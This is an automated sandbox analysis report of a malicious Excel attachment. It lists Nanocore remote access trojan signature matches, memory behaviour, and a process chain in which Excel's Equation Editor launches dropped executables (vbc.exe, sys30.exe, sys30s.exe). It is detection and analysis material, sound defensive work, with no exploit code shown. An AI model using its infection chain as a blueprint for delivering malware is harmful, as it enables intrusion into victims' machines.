Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.693081728.0000000003770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.693644067.0000000003908000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00380B77	6_2_00380B77
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003824C0	6_2_003824C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00383D88	6_2_00383D88
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00385CA8	6_2_00385CA8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00384638	6_2_00384638
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0038462A	6_2_0038462A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0038C708	6_2_0038C708
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00D8BB49	6_2_00D8BB49
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_0038F038	7_2_0038F038
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_003824C0	7_2_003824C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00380B77	7_2_00380B77
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00383D88	7_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_0038C118	7_2_0038C118
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00384638	7_2_00384638
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00384630	7_2_00384630
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00385CA8	7_2_00385CA8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C20048	7_2_00C20048
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C25478	7_2_00C25478
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C22E30	7_2_00C22E30
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C23560	7_2_00C23560
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C27D68	7_2_00C27D68
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C21370	7_2_00C21370
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C24C50	7_2_00C24C50
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C26C20	7_2_00C26C20
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C20021	7_2_00C20021
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C247C8	7_2_00C247C8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C247D8	7_2_00C247D8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C28998	7_2_00C28998
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C23550	7_2_00C23550
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C21368	7_2_00C21368
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_00C25F28	7_2_00C25F28
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_0122BB49	7_2_0122BB49
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 8_2_00250B77	8_2_00250B77
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 8_2_002524C0	8_2_002524C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001CE018	9_2_001CE018
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001CBBA8	9_2_001CBBA8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001C43A0	9_2_001C43A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001CAF90	9_2_001CAF90
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001C3788	9_2_001C3788
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001C4458	9_2_001C4458
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_001CBC66	9_2_001CBC66
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062F59C	9_2_0062F59C
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_006277A0	9_2_006277A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062C9A0	9_2_0062C9A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_00626B88	9_2_00626B88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062DE90	9_2_0062DE90
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062D5A8	9_2_0062D5A8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062D5B8	9_2_0062D5B8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062D676	9_2_0062D676
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062785E	9_2_0062785E
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_01024300	9_2_01024300
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_01023A10	9_2_01023A10
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0102035E	9_2_0102035E
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_010202A0	9_2_010202A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_010236C0	9_2_010236C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0122BB49	9_2_0122BB49

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe

Code function: 7_2_00C26618 CreateProcessAsUserW,

7_2_00C26618

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Memory allocated: 76E90000 page execute and read and write

Source: Enclosed.xlsx

ReversingLabs: Detection: 29%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exe
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
